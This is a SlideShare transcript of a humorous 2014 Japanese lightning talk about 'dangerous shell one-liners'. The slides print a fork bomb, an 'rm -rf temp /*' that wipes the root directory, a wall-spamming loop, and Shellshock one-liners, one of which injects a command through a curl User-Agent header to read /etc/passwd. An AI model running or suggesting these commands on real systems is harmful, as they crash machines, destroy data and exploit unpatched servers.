20141019 OSC Tokyo/Fall LT 【危険シェル芸】

1. 第1回危険シェル芸勉強会 USP友の会上田隆一

2. みなさん OSCお疲れさまでした 2014/10/19 OSC Tokyo/Fall 2014 2

3. しかし本日はここからが本番です 2014/10/19 OSC Tokyo/Fall 2014 3

4. 第1回危険シェル芸勉強会を勝手に開催致します 2014/10/19 OSC Tokyo/Fall 2014 4

5. 危険シェル芸とは • マウスも使わず、ソースコードも残さず、 GUIツールを立ち上げる間もなく、あらゆる破壊・迷惑・自滅行為を CLI端末へのコマンド入力一撃で終わらすこと。 http://blog.ueda.asia/?page_id=3752 2014/10/19 OSC Tokyo/Fall 2014 5

6. 思い出す夏の危険シェル芸騒動大炎上65000PV togetterより首謀者1 首謀者2 2014/10/19 OSC Tokyo/Fall 2014 6

7. 戦果（？） • 初日だけで見知らぬ方のマシン3台轟沈 • その他自爆者多数 • Docker上で試したらホストマシン沈黙の報告 • 自分の本がサイト経由で1冊だけ売れた • フォロワーが1人減った 2014/10/19 OSC Tokyo/Fall 2014 7

8. 本日はこの中から特に危険なのを勉強ちゃんとマスターしましょう 2014/10/19 OSC Tokyo/Fall 2014 8

9. ということでLet's try!!! 2014/10/19 OSC Tokyo/Fall 2014 9

10. ひとつめ :(){: | : &};: 2014/10/19 OSC Tokyo/Fall 2014 10

11. :(){: | : &};: • いわゆるフォーク爆弾 • 関数「:」のプロセスがマシンに溢れて再起不能 • Docker越しにホストを葬る殺傷力つまり一言で言うと・・・ 2014/10/19 OSC Tokyo/Fall 2014 11

12. 2014/10/19 OSC Tokyo/Fall 2014 12

13. ふたつめ • シェルスクリプトにて rm -rf temp /* テンポラリを削除*/ 出典: @moguno さんより 2014/10/19 OSC Tokyo/Fall 2014 13

14. rm -rf temp /* テンポラリを削除*/ • 消えるのはtempと/* • シェルスクリプトのコメントアウトは# 覚えておきたいのは・・・ 2014/10/19 OSC Tokyo/Fall 2014 14

15. 2014/10/19 OSC Tokyo/Fall 2014 15

16. みっつめ # for x in `seq 1 10000`; do wall '我はroot。神だ' ; done 出典: @ryoana14 さんより 2014/10/19 OSC Tokyo/Fall 2014 16

17. # for x in `seq 1 10000`; do wall '我はroot。神だ' ; done • 誰も端末使えないぞ！ • すごいポンポン言う！即ち・・・ 2014/10/19 OSC Tokyo/Fall 2014 17

18. アーンド 2014/10/19 OSC Tokyo/Fall 2014 18

19. 2014/10/19 OSC Tokyo/Fall 2014 19

20. 世界は危険に飢えている発言 2014/10/19 OSC Tokyo/Fall 2014 20

21. そんなある日、一つのワンライナーが Twitterに出回る 2014/10/19 OSC Tokyo/Fall 2014 21

22. $ env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 2014/10/19 OSC Tokyo/Fall 2014 22

23. 2014/10/19 OSC Tokyo/Fall 2014 23

24. ！？ 2014/10/19 OSC Tokyo/Fall 2014 24

25. $ curl -A '() { :; }; /bin/cat /etc/passwd | /usr/bin/tail -n 3' http://localhost/index.php 2014/10/19 OSC Tokyo/Fall 2014 25

26. 2014/10/19 OSC Tokyo/Fall 2014 26

27. あかんやろ 2014/10/19 OSC Tokyo/Fall 2014 27

28. 危険シェル芸で遊んでいたらシェルが危険だった 2014/10/19 OSC Tokyo/Fall 2014 28

29. 私の Shellshock後の世界 2014/10/19 OSC Tokyo/Fall 2014 29

30. 自著が危険書物扱い ※フォローしておくと, bashを使ってますがコマンド・ファイル・パイプが主眼でbashどっぷりというわけでもない本デス 2014/10/19 OSC Tokyo/Fall 2014 30

31. なぜか安否を確認される 2014/10/19 OSC Tokyo/Fall 2014 31

32. なぜか原稿を依頼される（焼け太り） 2014/10/19 OSC Tokyo/Fall 2014 32

33. 結論 • 危険シェル芸は危険 • Shellshockは危険 • 人生は危険 • 安全な方が精神的・肉体的によい – 「世界は危険に飢えている」なんて言ってごめんなさいごめんなさいごめんなさいごめんなさいごぬんなさい！ 2014/10/19 OSC Tokyo/Fall 2014 33

34. 以上。 2014/10/19 OSC Tokyo/Fall 2014 34

SlideShare for iOS

20141019 OSC Tokyo/Fall LT 【危険シェル芸】

by Ryuichi Ueda , Researcher at Universal Shell Programming Lab.

on Oct 19, 2014

Statistics

Views

Actions

2 Embeds 100

Accessibility

Categories

Upload Details

Usage Rights

Report content

20141019 OSC Tokyo/Fall LT 【危険シェル芸】 Presentation Transcript

https://twitter.com	93
https://tweetdeck.twitter.com	1